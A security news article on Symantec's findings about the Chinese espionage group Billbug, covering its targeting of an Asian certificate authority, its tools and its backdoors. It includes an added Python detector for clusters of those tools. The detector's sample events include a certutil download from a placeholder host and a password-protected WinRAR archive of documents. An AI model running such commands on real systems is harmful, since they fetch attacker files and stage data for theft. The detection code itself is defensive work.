
Chinese Cyberespionage Group ‘Billbug’ Targets Certificate Authority

A Chinese state-sponsored cyberespionage group tracked as Billbug has been observed targeting a certificate authority in Asia, along with other entities, Symantec reports.

Also tracked as Lotus Blossom and Thrip, Billbug is an advanced persistent threat (APT) actor mainly targeting entities in Southeast Asia and the United States. It’s believed to have been active since at least 2009.

Starting in March 2022, the group has been targeting multiple entities in Asia, including a certificate authority, a government organization, and defense agencies.

“The targeting of a certificate authority is notable, as if the attackers were able to successfully compromise it to access certificates they could potentially use them to sign malware with a valid certificate, and help it avoid detection on victim machines. It could also potentially use compromised certificates to intercept HTTPS traffic,” Symantec notes.

According to the security company, however, there is no evidence to suggest that the threat actor has managed to successfully compromise digital certificates.

As part of the observed attacks, the APT used multiple public tools and custom malware, including AdFind, Certutil, NBTscan, Ping, Port Scanner, Route, Stowaway Proxy Tool, Tracert, Winmail, and WinRAR, as well as the Hannotog and Sagerunex backdoors identified in 2019.

The Hannotog backdoor, Symantec explains, can update firewall settings, create a service for persistence, stop running services, upload encrypted data, harvest system information, and download files to the machine.

The Sagerunex backdoor, which uses multiple methods of communication with the command and control (C&C) server, supports commands to list running proxies, execute programs, steal files or drop files, and get configured file paths.
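As an added example (not from Symantec's report or this article), the following Python snippet shows one way a defender can use the tool list above for detection: it scans constructed process-creation events and flags hosts where several Billbug-associated tools run within a short window, since any single one of them (ping, certutil, WinRAR) is routine admin noise on its own. The log format, the 30-minute window, and the three-tool threshold are assumptions; only tools from the list with a well-known image name are matched.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Public tools named in the Billbug report that ship as recognisable executables.
# The regex matches the image name at the end of a Windows path.
BILLBUG_TOOLS = re.compile(
    r"(?:^|\\)(adfind|certutil|nbtscan|ping|tracert|route|winrar|stowaway)\.exe$",
    re.IGNORECASE,
)

# Constructed sample process-creation events (not real telemetry).
# Assumed format: "<UTC timestamp> | <host> | <image path> | <command line>".
SAMPLE_EVENTS = """\
2022-03-14T09:01:12Z | host-ca-01 | C:\\Windows\\System32\\certutil.exe | certutil -urlcache -split -f http://example.invalid/a.txt a.txt
2022-03-14T09:03:40Z | host-ca-01 | C:\\Users\\Public\\AdFind.exe | AdFind.exe -f objectcategory=computer
2022-03-14T09:05:02Z | host-ca-01 | C:\\Users\\Public\\nbtscan.exe | nbtscan.exe 10.0.0.0/24
2022-03-14T10:15:00Z | host-gov-07 | C:\\Windows\\System32\\ping.exe | ping 10.0.0.5
2022-03-15T08:00:00Z | host-gov-07 | C:\\Program Files\\WinRAR\\WinRAR.exe | WinRAR.exe a -p secret out.rar docs
"""


def parse_event(line):
    """Split one event line into (timestamp, host, image, command line)."""
    ts, host, image, cmdline = [f.strip() for f in line.split(" | ", 3)]
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), host, image, cmdline


def tool_name(image):
    """Return the lower-cased tool name if the image is on the watch list, else None."""
    m = BILLBUG_TOOLS.search(image)
    return m.group(1).lower() if m else None


def find_tool_clusters(log_text, window=timedelta(minutes=30), min_tools=3):
    """Return {host: sorted distinct tools} for each host on which at least
    `min_tools` different watch-listed tools ran within `window` of each other.
    One tool alone is not reported; the cluster of discovery tools is the signal."""
    per_host = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, host, image, _ = parse_event(line)
        tool = tool_name(image)
        if tool:
            per_host[host].append((ts, tool))
    alerts = {}
    for host, events in per_host.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            seen = {t for ts, t in events[i:] if ts - start <= window}
            if len(seen) >= min_tools:
                alerts[host] = sorted(seen)
                break
    return alerts
```

On the constructed sample, only host-ca-01 is reported (certutil, AdFind and NBTscan within four minutes); host-gov-07 runs two listed tools a day apart and stays quiet.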

“While we do not see data being exfiltrated in this campaign, Billbug is widely regarded as being an espionage actor, indicating that data theft is the most likely motivation in this campaign. The victims in this campaign – government agencies and a certificate authority – also point to an espionage and data-theft motive,” Symantec notes.

The cybersecurity firm also points out that the threat actor likely targeted government victims for espionage purposes, and likely hit the certificate authority to steal legitimate digital certificates.

“This is potentially very dangerous, as if Billbug is able to sign its malware with a valid digital certificate it may be able to bypass security detections on victim machines. The ability of this actor to compromise multiple victims at once indicates that this threat group remains a skilled and well-resourced operator that is capable of carrying out sustained and wide-ranging campaigns,” Symantec concludes.

Related: New Chinese Cyberespionage Group WIP19 Targets Telcos, IT Service Providers

Related: Chinese Cyberespionage Group ‘Witchetty’ Updates Toolset in Recent Attacks

Related: Chinese Threat Actors Exploiting ‘Follina’ Vulnerability

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
